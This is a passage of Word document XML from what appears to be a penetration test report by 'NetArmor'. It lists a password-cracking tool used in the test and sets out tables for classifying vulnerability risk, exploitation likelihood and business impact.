      </w:tr>
      <w:tr w:rsidR="1D8F7EFF" w14:paraId="4EB0EC25" w14:textId="77777777" w:rsidTr="00B94233">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="29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C65B2F4" w14:textId="2CBD277B" w:rsidR="771DADE0" w:rsidRDefault="771DADE0" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>John</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="70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5088632" w14:textId="44171E93" w:rsidR="1D8F7EFF" w:rsidRDefault="1D8F7EFF" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>Used to c</w:t>
            </w:r>
            <w:r w:rsidR="0B6FB329" w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>rack the password hashes store in the NBN users database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33D50794" w14:textId="2B1B3DDC" w:rsidR="000C13F1" w:rsidRPr="000C13F1" w:rsidRDefault="2E62A322" w:rsidP="000C13F1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc153834524"/>
      <w:r>
        <w:t>Risk Classifications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="536E1496" w14:textId="67EA1649" w:rsidR="563D332E" w:rsidRDefault="563D332E" w:rsidP="1D8F7EFF">
      <w:r>
        <w:t>NetArmor classifies and calculates the risk of vulnerabilities based on the table below.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9270" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
          <w:left w:w="100" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:right w:w="100" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1604"/>
        <w:gridCol w:w="1410"/>
        <w:gridCol w:w="6256"/>
      </w:tblGrid>
      <w:tr w:rsidR="00220DD3" w14:paraId="33372A16" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:trPr>
          <w:trHeight w:val="603"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1604" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:bottom w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000" w:themeColor="text1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
          </w:tcPr>
          <w:p w14:paraId="4899C6B7" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Level</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Pr>
          <w:p w14:paraId="4E69367E" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="355C5BB6" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00220DD3" w14:paraId="0B7D5CE8" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:trPr>
          <w:trHeight w:val="612"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1604" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
              <w:left w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
              <w:bottom w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
              <w:right w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="980000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66566714" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1410" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:left w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000" w:themeColor="text1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C7F3134" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="A61C00"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="A61C00"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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68F88BC" w14:textId="19408B46" w:rsidR="00220DD3" w:rsidRDefault="2E62A322">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
              </w:rPr>
              <w:t xml:space="preserve">The vulnerability poses an immediate threat to the organization. Successful exploitation </w:t>
            </w:r>
            <w:r w:rsidR="56BCF927" w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
              </w:rPr>
              <w:t xml:space="preserve">will </w:t>
            </w:r>
            <w:r w:rsidR="62972B23" w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
              </w:rPr>
              <w:t xml:space="preserve">grant attacker administrator privileges and view sensitive </w:t>
            </w:r>
            <w:r w:rsidR="7A27EC89" w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
              </w:rPr>
              <w:t xml:space="preserve">company </w:t>
            </w:r>
            <w:r w:rsidR="62972B23" w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
              </w:rPr>
              <w:t>data.</w:t>
            </w:r>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
              </w:rPr>
              <w:t xml:space="preserve"> Remediation should be immediately performed. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00220DD3" w14:paraId="504682ED" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:trPr>
          <w:trHeight w:val="554"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1604" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000" w:themeColor="text1"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000" w:themeColor="text1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="A61C00"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6361E421" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>High</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1F4ABA7" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="980000"/>
              </w:rPr>
              <w:t>7-9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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269CF68" w14:textId="72025BC5" w:rsidR="00220DD3" w:rsidRDefault="2E62A322">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
              </w:rPr>
              <w:t>The vulnerability poses an urgent threat to the organization</w:t>
            </w:r>
            <w:r w:rsidR="45F21B5D" w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
              </w:rPr>
              <w:t xml:space="preserve">. Successful exploitation will grant attacker </w:t>
            </w:r>
            <w:r w:rsidR="265DE983" w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
              </w:rPr>
              <w:t>access to sensitive company data.</w:t>
            </w:r>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="6B899188" w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
              </w:rPr>
              <w:t>R</w:t>
            </w:r>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
              </w:rPr>
              <w:t>emediation should be prioritized.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00220DD3" w14:paraId="4728FF10" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:trPr>
          <w:trHeight w:val="795"/>
          <w:jc w:val="center"/>
        </w:trPr>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1C232"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C19AD24" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Medium</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40141F43" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00220DD3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="F1C232"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5F00175E" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="F1C232"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="F1C232"/>
              </w:rPr>
              <w:t>4-6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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18D5CAC" w14:textId="03F93E07" w:rsidR="00220DD3" w:rsidRDefault="2E62A322">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
              </w:rPr>
              <w:t xml:space="preserve">Successful exploitation is possible and may result in </w:t>
            </w:r>
            <w:r w:rsidR="27030AB4" w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
              </w:rPr>
              <w:t>unwanted actions on company services</w:t>
            </w:r>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
              </w:rPr>
              <w:t>. This vulnerability should be remediated when feasible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00220DD3" w14:paraId="481F0F68" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:trPr>
          <w:trHeight w:val="672"/>
          <w:jc w:val="center"/>
        </w:trPr>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8761D"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0ACDD4B8" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>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5664A66" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00220DD3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="93C47D"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1040DD56" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="38761D"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="38761D"/>
              </w:rPr>
              <w:t>1-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="62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377DB26" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>The vulnerability poses a negligible/minimal threat to the organization. The presence of this vulnerability should be noted and remediated if possible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32131B31" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_n2vg1pp2wwur"/>
      <w:bookmarkStart w:id="22" w:name="_Toc153834525"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation Likelihood Classifications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>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1702"/>
        <w:gridCol w:w="7658"/>
      </w:tblGrid>
      <w:tr w:rsidR="00220DD3" w14:paraId="382D7FEE" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2206F57A" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="76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Pr>
          <w:p w14:paraId="00041886" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00220DD3" w14:paraId="7456D3D8" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>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6666"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4491B098" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="76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4308479" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Exploitation methods are well-known and can be performed using publicly available tools. Low-skilled attackers and automated tools could successfully exploit the vulnerability with minimal difficulty.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00220DD3" w14:paraId="6E2D4ED2" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:trPr>
          <w:trHeight w:val="663"/>
          <w:jc w:val="center"/>
        </w:trPr>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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="420A0705" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="76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15BC26E8" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Exploitation methods are well-known, may be performed using public tools, but require configuration. Understanding of the underlying system is required for successful exploitation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00220DD3" w14:paraId="0189F0CC" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B35C580" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="76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8E6990A" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Exploitation requires deep understanding of the underlying systems or advanced technical skills. Precise conditions may be required for successful exploitation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40262DC0" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc153834526"/>
      <w:r>
        <w:t>Business Impact Classifications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>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1722"/>
